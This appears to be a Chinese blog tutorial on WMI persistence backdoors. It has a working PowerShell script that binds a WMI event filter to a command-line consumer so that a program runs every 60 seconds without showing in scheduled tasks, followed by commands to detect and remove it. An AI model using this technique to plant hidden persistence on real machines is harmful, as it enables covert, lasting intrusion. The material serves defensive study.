WMI 的***,防御与取证分析技术之***篇:
http://drops.xmd5.com/static/drops/tips-9973.html
WMI 的***,防御与取证分析技术之防御篇
http://drops.xmd5.com/static/drops/tips-10346.html
wp-windows-management-instrumentation.pdf:
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
WMI backdoor:
http://bobao.360.cn/learning/detail/628.html
如何在系统日志中记录WMI Persistence:
http://www.4hou.com/technology/1860.html
(1)打开wmi服务
启动服务
win+R 输入 wmic
(2)编写一个powershell脚本,使用wmi隐藏一个定时任务
脚本内容如下:
$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:\Windows\System32\notepad.exe'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=
$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=
$WMIEventFilter;Consumer=$WMIEventConsumer}
打开powershell
启动管理员权限:
Start-Process powershell -Verb runAs
打开执行脚本权限:
set-ExecutionPolicy RemoteSigned
运行结果:
进程监控结果:
脚本功能:
每60s执行一次notepad.exe
查看计划任务没有这个,达到隐藏效果:
0x04 WMI后门检测及清除 :
1、查看当前WMI Event
【管理员权限】
#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
2、清除后门
#Filter
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose
#Consumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose
#Binding
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose
歇会。。。。。。。。。。。。更新中
转载于:https://blog.51cto.com/antivirusjo/2092545